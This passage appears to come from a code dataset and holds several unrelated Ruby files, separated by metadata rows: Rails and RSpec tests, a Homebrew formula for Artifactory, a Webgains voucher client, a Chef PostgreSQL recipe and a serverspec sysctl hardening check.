expected_display_names = @provider.buyer_accounts.map { |buyer| buyer.decorate.admin_user_display_name }
assert_same_elements expected_display_names, page.xpath('//tbody/tr/td[2]/a').map(&:text)
get admin_buyers_accounts_path(id: @buyer.id)
assert_xpath('//tbody/tr/td[2]/a', @buyer.decorate.admin_user_display_name)
end
test 'User with invalid data shows a flash error' do
post admin_buyers_accounts_path, params: {
account: {
org_name: 'My organization',
user: {
username: 'hello'
}
}
}
assert_equal 'Users invalid', flash[:error]
end
end
class MasterLoggedInTest < Buyers::AccountsControllerTest
def setup
@master = master_account
@provider = FactoryBot.create(:provider_account, provider_account: @master)
login! @master
end
test 'show plan for SaaS' do
ThreeScale.config.stubs(onpremises: false)
get admin_buyers_account_path(@provider)
assert_xpath( './/div[@id="applications_widget"]//table[@class="list"]//tr', 4)
assert_xpath( './/div[@id="applications_widget"]//table[@class="list"]//tr', /plan/i )
end
test 'do not show plan for on-prem' do
ThreeScale.config.stubs(onpremises: true)
get admin_buyers_account_path(@provider)
assert_xpath( './/div[@id="applications_widget"]//table[@class="list"]//tr', 2)
refute_xpath( './/div[@id="applications_widget"]//table[@class="list"]//tr', /plan/i )
end
test 'suspend button is displayed only when account is not deleted or marked for deletion' do
ThreeScale.config.stubs(onpremises: false)
get admin_buyers_account_path(@provider)
assert_select %(td a.button-to.action.suspend), true
@provider.suspend
get admin_buyers_account_path(@provider)
assert_select %(td a.button-to.action.suspend), false
delete admin_buyers_account_path(@provider)
assert_select %(td a.button-to.action.suspend), false
end
end
class NotLoggedInTest < ActionDispatch::IntegrationTest
test "anonymous users can't manage buyer accounts" do
provider = FactoryBot.create(:provider_account)
host! provider.admin_domain
get admin_buyers_accounts_path
assert_redirected_to provider_login_path
get new_admin_buyers_account_path
assert_redirected_to provider_login_path
buyer = FactoryBot.create(:simple_buyer, provider_account: provider, name: 'bob')
get admin_buyers_account_path(buyer)
assert_redirected_to provider_login_path
get edit_admin_buyers_account_path(buyer)
assert_redirected_to provider_login_path
put admin_buyers_account_path(buyer), params: {account: {name: 'carl'}}
assert_redirected_to provider_login_path
assert_equal 'bob', buyer.reload.name
delete admin_buyers_account_path(buyer)
assert_redirected_to provider_login_path
assert Account.exists?(buyer.id)
assert_no_difference(Account.method(:count)) do
post admin_buyers_accounts_path, params: {
account: {
name: 'secret agent',
user: { username: 'johndoe', email: '[email protected]', password: 'secretpassword' }
}
}
end
assert_redirected_to provider_login_path
end
end
end
| 34.592405 | 123 | 0.686183 |
e9381c63574a47fa55876fd58cb913e0f2c4cf97 | 2,153 | class Artifactory < Formula
desc "Manages binaries"
homepage "https://www.jfrog.com/artifactory/"
url "https://dl.bintray.com/jfrog/artifactory/jfrog-artifactory-oss-5.3.0.zip"
sha256 "7ede1581dde6d45bd766eec9881e9b2927bf084ca4ae9804352a2fa9d95e08bd"
bottle :unneeded
option "with-low-heap", "Run artifactory with low Java memory options. Useful for development machines. Do not use in production."
depends_on :java => "1.8+"
def install
# Remove Windows binaries
rm_f Dir["bin/*.bat"]
rm_f Dir["bin/*.exe"]
# Set correct working directory
inreplace "bin/artifactory.sh",
'export ARTIFACTORY_HOME="$(cd "$(dirname "${artBinDir}")" && pwd)"',
"export ARTIFACTORY_HOME=#{libexec}"
if build.with? "low-heap"
# Reduce memory consumption for non production use
inreplace "bin/artifactory.default",
"-server -Xms512m -Xmx2g",
"-Xms128m -Xmx768m"
end
libexec.install Dir["*"]
# Launch Script
bin.install_symlink libexec/"bin/artifactory.sh"
# Memory Options
bin.install_symlink libexec/"bin/artifactory.default"
end
def post_install
# Create persistent data directory. Artifactory heavily relies on the data
# directory being directly under ARTIFACTORY_HOME.
# Therefore, we symlink the data dir to var.
data = var/"artifactory"
data.mkpath
libexec.install_symlink data => "data"
end
plist_options :manual => "#{HOMEBREW_PREFIX}/opt/artifactory/libexec/bin/artifactory.sh"
def plist; <<-EOS.undent
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.jfrog.artifactory</string>
<key>WorkingDirectory</key>
<string>#{libexec}</string>
<key>Program</key>
<string>#{bin}/artifactory.sh</string>
<key>KeepAlive</key>
<true/>
</dict>
</plist>
EOS
end
test do
assert_match "Checking arguments to Artifactory", pipe_output("#{bin}/artifactory.sh check")
end
end
| 28.706667 | 132 | 0.667441 |
18c2bd89184f006c60ebb59f9515ba2decc9da3b | 693 | require 'spec_helper'
describe 'profile::app::rgbank' do
SUPPORTED_OS.each do |os, facts|
context "on #{os}" do
let(:facts) do
facts
end
before(:each) do
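# Stub puppetdb_query so the catalog can be compiled without a live PuppetDB backend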
Puppet::Parser::Functions.newfunction(:puppetdb_query, :type => :rvalue) do |args|
[{'facts'=>{'fqdn'=> 'testserver'}}]
end
end
if Gem.win_platform?
context "unsupported OS" do
it { is_expected.to compile.and_raise_error(/Unsupported OS/) }
end
else
context "without any parameters" do
it { is_expected.to compile.with_all_deps }
end
end
end
end
end
| 22.354839 | 92 | 0.539683 |
0322364da53f5ff49277bc53adc4851f91ba3ca2 | 1,088 | require 'open-uri'
require 'json'
module Rabatt
module Providers
class Webgains < Base
URL = 'http://api.webgains.com/2.0/vouchers'
DEFAULT_PARAMS = {
networks: 'SE'
}
attr_accessor :api_key
def initialize(api_key = nil)
self.api_key = api_key || ENV['WEBGAINS_API_KEY']
raise(ArgumentError, "Missing Webgains ApiKey") unless self.api_key
end
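# Queries the Webgains voucher endpoint and maps each JSON entry onto a Voucher value object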
def vouchers(options = {})
uri = URI.parse(URL)
params = DEFAULT_PARAMS.merge(**options, key: api_key)
uri.query = URI.encode_www_form(params)
res = open(uri)
JSON.parse(res.read).map do |data|
Voucher.build do |v|
v.uid = data['id']
v.program = data['program_name']
v.code = data['code']
v.valid_from = Date.parse(data['startDate'])
v.expires_on = Date.parse(data['expiryDate'])
v.summary = data['description']
v.url = data['destinationUrl']
v.provider = :webgains
end
end
end
end
end
end
| 25.302326 | 75 | 0.563419 |
6a37baed69148c952c8eb2ea96e93e44bdc22c8f | 1,069 | # encoding: UTF-8
#
# Cookbook Name:: openstack-ops-database
# Recipe:: postgresql-server
#
# Copyright 2013, Opscode, Inc.
# Copyright 2012-2013, Rackspace US, Inc.
# Copyright 2013, AT&T Services, Inc.
# Copyright 2013, SUSE Linux GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
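# Reopen Chef::Recipe to mix in the Openstack cookbook helpers (provides the endpoint lookup used below).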
class ::Chef::Recipe # rubocop:disable Documentation
include ::Openstack
end
db_endpoint = endpoint 'db'
node.override['postgresql']['config']['listen_addresses'] = db_endpoint.host
include_recipe 'openstack-ops-database::postgresql-client'
include_recipe 'postgresql::server'
| 31.441176 | 76 | 0.757717 |
ac03a57d12bf00590133afb0468ae3a4421145e1 | 562 | require 'spec_helper_acceptance'
# Ensure IPv6 router advertisements are not accepted - Section 3.3.1
# Ensure IPv6 redirects are not accepted - Section 3.3.2
describe file ( '/etc/sysctl.d/99-sysctl.conf' ) do
it { should be_symlink }
it { should be_owned_by 'root' }
it { should be_grouped_into 'root' }
its (:content) { should match /net.ipv6.conf.all.accept_ra = 0/ }
its (:content) { should match /net.ipv6.conf.default.accept_ra = 0/ }
its (:content) { should match /net.ipv6.conf.all.accept_redirects = 0/ }
its (:content) { should match /net.ipv6.conf.default.accept_redirects = 0/ }
end | 43.230769 | 76 | 0.690391 |
6ad56dd368243c59aecd37492622b79fa49e551d | 551 | # frozen_string_literal: true
module Gitlab
module SlashCommands
module Presenters
class IssueComment < Presenters::Base
include Presenters::NoteBase
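# Respond with an ephemeral message confirming the newly created comment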
def present
ephemeral_response(response_message)
end
private
def fallback_message
"New comment on #{issue.to_reference}: #{issue.title}"
end
def pretext
"I commented on an issue on #{author_profile_link}'s behalf: *#{issue.to_reference}* in #{project_link}"
end
end
end
end
end
| 21.192308 | 114 | 0.627949 |
1d9222575d68d4b231ac0223aa94aafe94e1877b | 143 | require 'test_helper'
class YogaClassesControllerTest < ActionDispatch::IntegrationTest
# test "the truth" do
# assert true
# end
end
| 17.875 | 65 | 0.748252 |